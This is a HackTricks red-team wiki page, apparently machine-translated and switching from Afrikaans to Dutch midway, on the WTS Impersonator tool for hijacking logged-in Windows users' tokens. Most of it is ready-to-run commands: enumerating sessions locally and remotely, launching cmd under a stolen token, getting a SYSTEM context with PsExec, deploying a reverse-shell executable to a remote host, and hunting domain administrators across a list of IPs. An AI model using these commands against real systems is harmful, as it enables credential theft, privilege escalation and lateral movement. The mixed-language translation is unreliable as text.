hacktricks/windows-hardening/stealing-credentials/WTS-Impersonator.md
2024-02-11 02:07:06 +00:00

4.4 KiB

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Die WTS Impersonator-instrument maak gebruik van die "\pipe\LSM_API_service" RPC Genoemde pyp om stilletjies ingelogde gebruikers op te som en hul tokens te kaap, terwyl tradisionele Token Impersonation-tegnieke omseil word. Hierdie benadering fasiliteer naadlose laterale bewegings binne netwerke. Die innovasie agter hierdie tegniek word toegeskryf aan Omri Baso, wie se werk beskikbaar is op GitHub.

Kernfunksionaliteit

Die instrument werk deur 'n reeks API-oproepe:

WTSEnumerateSessionsA  WTSQuerySessionInformationA  WTSQueryUserToken  CreateProcessAsUserW

Sleutelmodules en Gebruik

  • Gebruikers Enumereren: Lokale en externe gebruikersenumeratie is mogelijk met de tool, met behulp van commando's voor beide scenario's:
  • Lokaal:
.\WTSImpersonator.exe -m enum
  • Extern, door een IP-adres of hostnaam op te geven:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
  • Commando's Uitvoeren: De modules exec en exec-remote vereisen een Service-context om te functioneren. Lokale uitvoering vereist eenvoudigweg het WTSImpersonator uitvoerbare bestand en een commando:
  • Voorbeeld voor lokale commando-uitvoering:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
  • PsExec64.exe kan worden gebruikt om een service-context te verkrijgen:
.\PsExec64.exe -accepteula -s cmd.exe
  • Externe Commando-Uitvoering: Hierbij wordt op afstand een service gemaakt en geïnstalleerd, vergelijkbaar met PsExec.exe, waardoor uitvoering met de juiste machtigingen mogelijk is.
  • Voorbeeld van externe uitvoering:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
  • Gebruikersjachtmodule: Richt zich op specifieke gebruikers op meerdere machines en voert code uit onder hun referenties. Dit is vooral handig voor het targeten van Domeinbeheerders met lokale beheerdersrechten op verschillende systemen.
  • Gebruiksvoorbeeld:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Andere manieren om HackTricks te ondersteunen: